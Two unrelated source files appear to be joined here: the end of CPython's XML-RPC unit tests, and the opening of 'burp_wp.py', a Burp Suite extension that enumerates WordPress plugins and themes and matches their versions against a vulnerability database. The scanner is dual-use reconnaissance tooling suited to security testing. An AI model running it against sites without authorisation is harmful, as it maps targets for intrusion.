# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
class BrokenDispatcher:
def _marshaled_dispatch(self, data, dispatch_method=None, path=None):
raise RuntimeError("broken dispatcher")
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, xmlrpc.server.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
serv.add_dispatcher("/is/broken", BrokenDispatcher())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
        # e may be an OSError without errcode/headers; fall back to its string form.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
try:
xmlrpclib.ServerProxy(URL).my_function()
except (xmlrpclib.ProtocolError, OSError) as e:
if not is_unavailable_exception(e):
raise
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
thread = threading.Thread(target=self.threadFunc, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
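        # clear the event so tearDown() can wait for the second set (server shutdown);
        # see the note above http_server()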
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_client_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii_methodname(self):
try:
p = xmlrpclib.ServerProxy(URL, encoding='ascii')
self.assertEqual(p.têšt(42), 42)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_404(self):
# send POST with http.client, it should return 404 header and
# 'Not Found' message.
with contextlib.closing(http.client.HTTPConnection(ADDR, PORT)) as conn:
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
expected_methods = set(['pow', 'div', 'my_function', 'add', 'têšt',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall',
'Fixture'])
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<class \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<class \'Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
def test_allow_dotted_names_true(self):
# XXX also need allow_dotted_names_false test.
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
data = server.Fixture.getData()
self.assertEqual(data, '42')
def test_unicode_host(self):
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
self.assertEqual(server.add("a", "\xe9"), "a\xe9")
def test_partial_post(self):
# Check that a partial POST doesn't make the server loop: issue #14001.
with contextlib.closing(socket.create_connection((ADDR, PORT))) as conn:
conn.send('POST /RPC2 HTTP/1.0\r\n'
'Content-Length: 100\r\n\r\n'
'bye HTTP/1.1\r\n'
f'Host: {ADDR}:{PORT}\r\n'
'Accept-Encoding: identity\r\n'
'Content-Length: 0\r\n\r\n'.encode('ascii'))
def test_context_manager(self):
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, 3)
self.assertNotEqual(server('transport')._connection,
(None, None))
self.assertEqual(server('transport')._connection,
(None, None))
def test_context_manager_method_error(self):
try:
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, "a")
except xmlrpclib.Fault:
pass
self.assertEqual(server('transport')._connection,
(None, None))
class SimpleServerEncodingTestCase(BaseServerTestCase):
@staticmethod
def threadFunc(evt, numrequests, requestHandler=None, encoding=None):
http_server(evt, numrequests, requestHandler, 'iso-8859-15')
def test_server_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
def test_path3(self):
p = xmlrpclib.ServerProxy(URL+"/is/broken")
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#Verify that multiple requests sent over one connection are all handled by a
#single request handler instance (i.e. the connection really is kept alive)
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
        #there should have been two request handler instances, each having logged
        #at least two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipServerTestCase(BaseServerTestCase):
    #a request handler that supports keep-alive and records the content length
    #of the last request in a class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
p("close")()
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegex(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
p("close")()
def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipUtilTestCase(unittest.TestCase):
def test_gzip_decode_limit(self):
max_gzip_decode = 20 * 1024 * 1024
data = b'\0' * max_gzip_decode
encoded = xmlrpclib.gzip_encode(data)
decoded = xmlrpclib.gzip_decode(encoded)
self.assertEqual(len(decoded), max_gzip_decode)
data = b'\0' * (max_gzip_decode + 1)
encoded = xmlrpclib.gzip_encode(data)
with self.assertRaisesRegex(ValueError,
"max gzipped payload length exceeded"):
xmlrpclib.gzip_decode(encoded)
xmlrpclib.gzip_decode(encoded, max_decode=-1)
class HeadersServerTestCase(BaseServerTestCase):
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
test_headers = None
def do_POST(self):
self.__class__.test_headers = self.headers
return super().do_POST()
requestHandler = RequestHandler
standard_headers = [
'Host', 'Accept-Encoding', 'Content-Type', 'User-Agent',
'Content-Length']
def setUp(self):
self.RequestHandler.test_headers = None
return super().setUp()
def assertContainsAdditionalHeaders(self, headers, additional):
expected_keys = sorted(self.standard_headers + list(additional.keys()))
self.assertListEqual(sorted(headers.keys()), expected_keys)
for key, value in additional.items():
self.assertEqual(headers.get(key), value)
def test_header(self):
p = xmlrpclib.ServerProxy(URL, headers=[('X-Test', 'foo')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_many(self):
p = xmlrpclib.ServerProxy(
URL, headers=[('X-Test', 'foo'), ('X-Test-Second', 'bar')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(
headers, {'X-Test': 'foo', 'X-Test-Second': 'bar'})
def test_header_empty(self):
p = xmlrpclib.ServerProxy(URL, headers=[])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {})
def test_header_tuple(self):
p = xmlrpclib.ServerProxy(URL, headers=(('X-Test', 'foo'),))
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_items(self):
p = xmlrpclib.ServerProxy(URL, headers={'X-Test': 'foo'}.items())
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
# Actual value of the URL doesn't matter if it is a string in
# the correct format.
self.url = 'http://fake.localhost'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(http.client.HTTPMessage):
def get(self, key, failobj=None):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return super().get(key, failobj)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
thread = threading.Thread(target=http_server, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
default_class = http.client.HTTPMessage
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = default_class
def test_basic(self):
# check that flag is false by default
flagval = xmlrpc.server.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
xmlrpc.server.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("X-exception"), expected_err)
self.assertTrue(e.headers.get("X-traceback") is not None)
else:
self.fail('ProtocolError not raised')
@contextlib.contextmanager
def captured_stdout(encoding='utf-8'):
"""A variation on support.captured_stdout() which gives a text stream
having a `buffer` attribute.
"""
orig_stdout = sys.stdout
sys.stdout = io.TextIOWrapper(io.BytesIO(), encoding=encoding)
try:
yield sys.stdout
finally:
sys.stdout = orig_stdout
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = xmlrpc.server.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with os_helper.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with captured_stdout(encoding=self.cgi.encoding) as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with os_helper.EnvironmentVarGuard() as env, \
captured_stdout(encoding=self.cgi.encoding) as data_out, \
support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
            # the server should respond with a Fault; if so, our goal is achieved ;)
handle = data_out.read()
            # start at the 44th char so as to skip the http header; we just
            # need the xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
            # Using the same test method in order to avoid all the data-passing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEqual(
int(re.search(r'Content-Length: (\d+)', handle).group(1)),
len(content))
class UseBuiltinTypesTestCase(unittest.TestCase):
def test_use_builtin_types(self):
        # SimpleXMLRPCDispatcher.__init__ accepts use_builtin_types, which
        # makes it dispatch binary data as bytes instances and datetime
        # arguments as datetime.datetime instances.
self.log = []
expected_bytes = b"my dog has fleas"
expected_date = datetime.datetime(2008, 5, 26, 18, 25, 12)
marshaled = xmlrpclib.dumps((expected_bytes, expected_date), 'foobar')
def foobar(*args):
self.log.extend(args)
handler = xmlrpc.server.SimpleXMLRPCDispatcher(
allow_none=True, encoding=None, use_builtin_types=True)
handler.register_function(foobar)
handler._marshaled_dispatch(marshaled)
self.assertEqual(len(self.log), 2)
mybytes, mydate = self.log
self.assertEqual(self.log, [expected_bytes, expected_date])
self.assertIs(type(mydate), datetime.datetime)
self.assertIs(type(mybytes), bytes)
def test_cgihandler_has_use_builtin_types_flag(self):
handler = xmlrpc.server.CGIXMLRPCRequestHandler(use_builtin_types=True)
self.assertTrue(handler.use_builtin_types)
def test_xmlrpcserver_has_use_builtin_types_flag(self):
server = xmlrpc.server.SimpleXMLRPCServer(("localhost", 0),
use_builtin_types=True)
server.server_close()
self.assertTrue(server.use_builtin_types)
@threading_helper.reap_threads
def test_main():
support.run_unittest(XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, UseBuiltinTypesTestCase,
SimpleServerTestCase, SimpleServerEncodingTestCase,
KeepaliveServerTestCase1, KeepaliveServerTestCase2,
GzipServerTestCase, GzipUtilTestCase, HeadersServerTestCase,
MultiPathServerTestCase, ServerProxyTestCase, FailingServerTestCase,
CGIHandlerTestCase, SimpleXMLRPCDispatcherTestCase)
if __name__ == "__main__":
test_main()
|
burp_wp.py
|
# ____ _ _ ____ ____ __ ______
# | __ )| | | | _ \| _ \ \ \ / / _ \
# | _ \| | | | |_) | |_) | \ \ /\ / /| |_) |
# | |_) | |_| | _ <| __/ \ V V / | __/
# |____/ \___/|_| \_\_| \_/\_/ |_|
#
# MIT License
#
# Copyright (c) 2018 Kacper Szurek
import collections
import hashlib
import json
import os
import re
import shutil
import threading
import time
import traceback
import urlparse
from array import array
from base64 import b64encode, b64decode
from collections import defaultdict
from distutils.version import LooseVersion
from itertools import chain
from threading import Lock
from burp import IBurpExtender
from burp import IBurpExtenderCallbacks
from burp import IContextMenuFactory
from burp import IHttpListener
from burp import IIntruderPayloadGenerator
from burp import IIntruderPayloadGeneratorFactory
from burp import IMessageEditorController
from burp import IParameter
from burp import IScanIssue
from burp import ITab
from burp import IScannerCheck
from java.awt import Component
from java.awt import Cursor
from java.awt import Desktop
from java.awt import Dimension
from java.awt.event import ActionListener
from java.awt.event import ItemEvent
from java.awt.event import ItemListener
from java.awt.event import MouseAdapter
from java.net import URL, URI
from java.security import KeyFactory
from java.security import Signature
from java.security.spec import X509EncodedKeySpec
from java.util import ArrayList
from javax.swing import BoxLayout
from javax.swing import JButton
from javax.swing import JCheckBox
from javax.swing import JComboBox
from javax.swing import JEditorPane
from javax.swing import JFileChooser
from javax.swing import JLabel
from javax.swing import JMenuItem
from javax.swing import JOptionPane
from javax.swing import JPanel
from javax.swing import JProgressBar
from javax.swing import JScrollPane
from javax.swing import JSplitPane
from javax.swing import JTabbedPane
from javax.swing import JTable
from javax.swing import JTextField
from javax.swing.event import DocumentListener
from javax.swing.table import AbstractTableModel
from org.python.core.util import StringUtil
BURP_WP_VERSION = '0.2'
INTERESTING_CODES = [200, 401, 403, 301]
DB_NAME = "burp_wp_database.db"
class BurpExtender(IBurpExtender, IHttpListener, ITab, IContextMenuFactory, IMessageEditorController, IScannerCheck):
config = {}
def print_debug(self, message):
if self.config.get('debug', False):
self.callbacks.printOutput(message)
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.callbacks.printOutput("WordPress Scanner version {}".format(BURP_WP_VERSION))
self.helpers = callbacks.getHelpers()
self.initialize_config()
self.callbacks.setExtensionName("WordPress Scanner")
# createMenuItems
self.callbacks.registerContextMenuFactory(self)
# processHttpMessage
self.callbacks.registerHttpListener(self)
self.callbacks.registerIntruderPayloadGeneratorFactory(IntruderPluginsGenerator(self))
self.callbacks.registerIntruderPayloadGeneratorFactory(IntruderThemesGenerator(self))
self.callbacks.registerIntruderPayloadGeneratorFactory(IntruderPluginsThemesGenerator(self))
# doPassiveScan
self.callbacks.registerScannerCheck(self)
self.initialize_variables()
self.initialize_gui()
# getTabCaption, getUiComponent
# This must be AFTER panel_main initialization
self.callbacks.addSuiteTab(self)
self.initialize_database()
def initialize_config(self):
temp_config = self.callbacks.loadExtensionSetting("config")
if temp_config and len(temp_config) > 10:
try:
self.config = json.loads(b64decode(temp_config))
self.print_debug("[+] initialize_config configuration: {}".format(self.config))
except:
self.print_debug("[-] initialize_config cannot load configuration: {}".format(traceback.format_exc()))
else:
self.print_debug("[+] initialize_config new configuration")
self.config = {'active_scan': True, 'database_path': os.path.join(os.getcwd(), DB_NAME),
'wp_content': 'wp-content', 'full_body': False, 'all_vulns': False, 'scan_type': 1,
'debug': False, 'auto_update': True, 'last_update': 0, 'sha_plugins': '', 'sha_themes': '',
'sha_admin_ajax': '', 'print_info': False, 'admin_ajax': True, 'update_burp_wp': '0'}
def initialize_variables(self):
self.is_burp_pro = True if "Professional" in self.callbacks.getBurpVersion()[0] else False
self.regexp_version_number = re.compile("ver=([0-9.]+)", re.IGNORECASE)
self.regexp_stable_tag = re.compile(r"(?:stable tag|version):\s*(?!trunk)([0-9a-z.-]+)", re.IGNORECASE)
self.regexp_version_from_changelog = re.compile(
r"[=]+\s+(?:v(?:ersion)?\s*)?([0-9.-]+)[ \ta-z0-9().\-,]*[=]+",
re.IGNORECASE)
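        # Illustrative examples (not from the original source) of what these patterns match:
        #   regexp_version_number:          "style.css?ver=1.2.3"        -> "1.2.3"
        #   regexp_stable_tag:              "Stable tag: 4.1.2"          -> "4.1.2"
        #   regexp_version_from_changelog:  "= 1.5.2 =" (readme heading) -> "1.5.2"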
self.list_issues = ArrayList()
self.lock_issues = Lock()
self.lock_update_database = Lock()
self.database = {'plugins': collections.OrderedDict(), 'themes': collections.OrderedDict(), 'admin_ajax': {}}
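        # Sketch of the layout built by _update_database (assumed, for orientation only):
        #   'plugins'/'themes' map a slug to a list of bug dicts such as
        #     {'id': 123, 'title': '...', 'vuln_type': 'XSS', 'reference': [...], 'fixed_in': '1.2.3'}
        #   'admin_ajax' maps an ajax action name to a list of plugin slugs.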
self.list_plugins_on_website = defaultdict(list)
def initialize_gui(self):
class CheckboxListener(ItemListener):
def __init__(self, extender, name):
self.extender = extender
self.name = name
def itemStateChanged(self, e):
if e.getStateChange() == ItemEvent.SELECTED:
self.extender.update_config(self.name, True)
else:
self.extender.update_config(self.name, False)
class ComboboxListener(ActionListener):
def __init__(self, extender, name):
self.extender = extender
self.name = name
def actionPerformed(self, action_event):
selected = self.extender.combobox_scan_type.getSelectedItem().get_key()
self.extender.update_config(self.name, selected)
class TextfieldListener(DocumentListener):
def __init__(self, extender):
self.extender = extender
def changedUpdate(self, document):
self._do(document)
def removeUpdate(self, document):
self._do(document)
def insertUpdate(self, document):
self._do(document)
def _do(self, document):
wp_content = self.extender.textfield_wp_content.getText().replace("/", "")
self.extender.update_config('wp_content', wp_content)
class CopyrightMouseAdapter(MouseAdapter):
def __init__(self, url):
self.url = URI.create(url)
def mouseClicked(self, event):
if Desktop.isDesktopSupported() and Desktop.getDesktop().isSupported(Desktop.Action.BROWSE):
try:
Desktop.getDesktop().browse(self.url)
                    except:
                        # this nested listener has no reference to the extender,
                        # so there is nothing useful to log here
                        pass
class ComboboxItem:
def __init__(self, key, val):
self._key = key
self._val = val
def get_key(self):
return self._key
